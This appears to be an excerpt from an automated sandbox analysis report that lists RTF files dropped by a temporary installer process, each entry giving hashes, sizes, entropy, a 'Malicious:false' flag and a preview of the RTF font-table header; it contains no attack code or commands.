                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 0202060305040502030
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):38831
                                                                                                                                                                                                                                                          Entropy (8bit):5.022754170432963
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:wMF2weYJK4J7bIWIRV9OOVQjwQ49PomsZ/HuJct9:wM3wJF4Zko9
                                                                                                                                                                                                                                                          MD5:01A4A15CD5BE8B0E0E0B34200D995311
                                                                                                                                                                                                                                                          SHA1:D30F6F8219B9B3E91F9D1D0C5283F94A6CF0F124
                                                                                                                                                                                                                                                          SHA-256:D8A325D699C34E761833F16416EEBAAB43AA66454D08B7ECC40B4E5B89C1DF80
                                                                                                                                                                                                                                                          SHA-512:7C968B597067F2E0D0645219A96284C9868298F184FBB479CE214E7F997C353817F079C40D8BC7F79AAAAC42AAF216D33ACEC6407F1B24E60DBA4876426A734F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0302020204030204}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):68811
                                                                                                                                                                                                                                                          Entropy (8bit):5.0062740217102695
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qMF2weRlqEW0TgegJ9Vte5iMSf3TDcbIWIRV9hMJu8WjbvH/o2ZuTCHF3wZxyiQg:qMChO5Nkf5
                                                                                                                                                                                                                                                          MD5:9904281F0A850031B5DC777E69ACE68A
                                                                                                                                                                                                                                                          SHA1:1B630CE1A72C6F2A1CB9C8B7A1FC81C2FD2ED3F0
                                                                                                                                                                                                                                                          SHA-256:5888B749E1FC255BF39896EABE4B24B461BB4904549B1050AE8AE72296B72F11
                                                                                                                                                                                                                                                          SHA-512:22C5E7E021B2428225E1595EBF628C83A97BCB76F7D52DD330F72F232E42B9BDAFCDB92A3B858909399700AC1A6FAED2A5A5138B1D66258937698D1684701905
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0302020204030204}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43205
                                                                                                                                                                                                                                                          Entropy (8bit):5.029790593334823
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:joOfYRlj4lmbIWIRV9hiuFfmXYPxz7XzzMVFGqpJzVnz2T8VngbYh8snZHHuJfO:joblNkfO
                                                                                                                                                                                                                                                          MD5:D4CB2191EA1740D821C8C26C19033BE6
                                                                                                                                                                                                                                                          SHA1:3544CFF8E4BCF6BA57A63585AD6DAA2D244DC6D3
                                                                                                                                                                                                                                                          SHA-256:7C075B420A250AC2F36DDAC2834B422FF8B858B0D6E02A9BF7AA5A40FFF6AB39
                                                                                                                                                                                                                                                          SHA-512:D23AB39C0ABA07D99D7F03FAB498C2DADC81247FBC98DD758ABB94413041778BA5A83372F0F5AC20911B1C5F6B61313D6EBA26E966110F482B6B23D3BDAD94CF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):41900
                                                                                                                                                                                                                                                          Entropy (8bit):5.016535633453485
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:xoOfYRj7jOcPI0QhhiLV6qiTqP7Mi6uxPwjmkoASoGpngl4ZbbsVj72Q/za1CkCI:xobqUncV/QNkf8
                                                                                                                                                                                                                                                          MD5:4610A71940E165CB27249C3133800D76
                                                                                                                                                                                                                                                          SHA1:395941C9ECEE674429A1108075F9DD0A241CF28B
                                                                                                                                                                                                                                                          SHA-256:AAE092EC9F04F37A0059D595A581A9818DB18A4247B95F237E20EED5571BC843
                                                                                                                                                                                                                                                          SHA-512:D297B3B4AEA83E3107A0C799A238C40060BBF7247DEFEF0E179A2F61ADF06442BFC90577C705CAB0D3D2D0D12BD3C86F56C0B5ED971087C47A1973B54853DE32
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 0202060305040502030
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):61874
                                                                                                                                                                                                                                                          Entropy (8bit):5.01308589618829
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qOF2whYDh4GQgJAqxAUZ8ipwQduXyufTM3wEmgIqvNNb+S/5lqmhIFBjMpVWH3WA:qOQxqiBXZko0
                                                                                                                                                                                                                                                          MD5:149EB3F389063EE27E719BA447DAD74E
                                                                                                                                                                                                                                                          SHA1:1A4BF26BB1082D14EFDE795E2EC0E2357F0A3E74
                                                                                                                                                                                                                                                          SHA-256:61576A27746879AC99F0F0A588FA18BD49A62908A3EF1CBD0446F3F3D18CD0FD
                                                                                                                                                                                                                                                          SHA-512:F72E59E3935176D0D8E659F64FB344EBAE43928C7F53633160E8D7F34F2EAA0C9C738EE0DC87F14E1C35D822BB0B3247C3F427FF657F97C0E73463C116D29799
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fcharse
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44111
                                                                                                                                                                                                                                                          Entropy (8bit):5.034804043043812
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:jaOfIRlU4LgJAqxAUZa25iMSf3TaCkqooYidqm4eEHEvsEJ5sCXSIKEjZHHuJfM:jap7NkfM
                                                                                                                                                                                                                                                          MD5:D6C4CE3A479398A0C89448CF3D344268
                                                                                                                                                                                                                                                          SHA1:03399F4D355A631C8504B35AA82238E444D2A75E
                                                                                                                                                                                                                                                          SHA-256:56DA26981FD5603C5BB388D63B900EF90B42234F9FA6EA48BC7650BC609CC187
                                                                                                                                                                                                                                                          SHA-512:838AE1B09A693DE3A21C37087192C58F56D1D318A6265DA290CA1AB449DA85716BDD8B0D32B0D6D37EAADEDD2D8B89F31BC1F8A800A28B058286490A4720E9D0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fchar
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):49143
                                                                                                                                                                                                                                                          Entropy (8bit):5.0303602087233
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qOF2w9Rll41gJAqxAUZ2ipwQduXLwzq3PtDxdMNzx9AW94V2sQSuUNKKLz5cZecD:qOhKZkos
                                                                                                                                                                                                                                                          MD5:45FFBE8D6F213774FC03CED4B2C6DE2F
                                                                                                                                                                                                                                                          SHA1:B206C836CD793CB43A90FB7F55F20BCD0E588F45
                                                                                                                                                                                                                                                          SHA-256:D4928483BCC0FF7D15BD5B6B6669B82645EA4EC7C454A1F3BCDAFE0E984466BF
                                                                                                                                                                                                                                                          SHA-512:3153444C8413A6E6F6B4B1D0603E18D282A1B5DCAAC064FEFF2F8D9CF63AF5C7F7DDFBC77F26789384FF0E056741C615158570FD0B65114CE493692516316086
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fcharse
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44016
                                                                                                                                                                                                                                                          Entropy (8bit):5.032158423293101
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:jaOfIRlR4kgJAqxAUZC25iMSf3TIDgE6/o4WGrHwoKkASAt4Nb4B9SZHHuJf5:japUUNkf5
                                                                                                                                                                                                                                                          MD5:CA0B924C577837EAB433DFACF50B0A2B
                                                                                                                                                                                                                                                          SHA1:5FE70BC33A1A72354EB7CFA7327F993383F5CBF3
                                                                                                                                                                                                                                                          SHA-256:62C5D1371C91B454DDE8DF1DB0D628EE59917A766E42475FD17F6EA1E168837F
                                                                                                                                                                                                                                                          SHA-512:A1A20927E1DD4F3F63D8F9D69C23A4C62920C65972B4967BDE5C6FB49EE375B0FD3BC56F57DDB190C267921779A506C42960AA1E9BD7AF979CF6EBB954AD6925
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fchar
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):40154
                                                                                                                                                                                                                                                          Entropy (8bit):5.0200796695222865
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:xoOfYRjCjOcPI0QhhiLVjLqPQcCTjwC9UqUkVuss8HD43p8ZHHuJf5:xobLUntNkf5
                                                                                                                                                                                                                                                          MD5:8360940E8A2388A3DE31148F9ED5DCBF
                                                                                                                                                                                                                                                          SHA1:6B44DF438877025970E59C226D3F3D347CCDC264
                                                                                                                                                                                                                                                          SHA-256:AE905D395961C89647DF96F870FB8BFB199D72FF40BD62C6B95413C06CC03927
                                                                                                                                                                                                                                                          SHA-512:1E58457C3359EEED8C187A5F60C09D6CFEAA3A995BE0FD3F22690A02383DF9DEFE5B60EFA1BF8B4FC0975B17683629292D3118DF670C4CBF1DF3141B73D4ACF5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 0202060305040502030
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):38831
                                                                                                                                                                                                                                                          Entropy (8bit):5.022754170432963
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:wMF2weYJK4J7bIWIRV9OOVQjwQ49PomsZ/HuJct9:wM3wJF4Zko9
                                                                                                                                                                                                                                                          MD5:01A4A15CD5BE8B0E0E0B34200D995311
                                                                                                                                                                                                                                                          SHA1:D30F6F8219B9B3E91F9D1D0C5283F94A6CF0F124
                                                                                                                                                                                                                                                          SHA-256:D8A325D699C34E761833F16416EEBAAB43AA66454D08B7ECC40B4E5B89C1DF80
                                                                                                                                                                                                                                                          SHA-512:7C968B597067F2E0D0645219A96284C9868298F184FBB479CE214E7F997C353817F079C40D8BC7F79AAAAC42AAF216D33ACEC6407F1B24E60DBA4876426A734F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0302020204030204}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):47415
                                                                                                                                                                                                                                                          Entropy (8bit):5.015734147683168
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:jnTmY+EN4mXbIWIRV9sK8qoZzNqZiuJo8cDovLQoAn3Brxw2mB+c37DWZlIpIkpU:jnciZhNkfY
                                                                                                                                                                                                                                                          MD5:A7A6E83C7BF0C9446D815E04CB208372
                                                                                                                                                                                                                                                          SHA1:793D0F666A6E771A4864B169BBE282F943D5D043
                                                                                                                                                                                                                                                          SHA-256:B5323857EF076CBEBD3B870F4C8EB5C58B968ED51ACB6821C0A93C2FFE53A1AB
                                                                                                                                                                                                                                                          SHA-512:A5B09DD7D7C362B1807F6B9216318AA3598943688EFA39D4E15DB49DCE7743C9DC2574DC182BFCCFBB3501A7A1273A073FC97F8BC714084806B16DC8F43B49F5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Calibri Light;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \fnil\fcharset134\fprq2{\*\panose 0201
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):68811
                                                                                                                                                                                                                                                          Entropy (8bit):5.0062740217102695
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qMF2weRlqEW0TgegJ9Vte5iMSf3TDcbIWIRV9hMJu8WjbvH/o2ZuTCHF3wZxyiQg:qMChO5Nkf5
                                                                                                                                                                                                                                                          MD5:9904281F0A850031B5DC777E69ACE68A
                                                                                                                                                                                                                                                          SHA1:1B630CE1A72C6F2A1CB9C8B7A1FC81C2FD2ED3F0
                                                                                                                                                                                                                                                          SHA-256:5888B749E1FC255BF39896EABE4B24B461BB4904549B1050AE8AE72296B72F11
                                                                                                                                                                                                                                                          SHA-512:22C5E7E021B2428225E1595EBF628C83A97BCB76F7D52DD330F72F232E42B9BDAFCDB92A3B858909399700AC1A6FAED2A5A5138B1D66258937698D1684701905
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
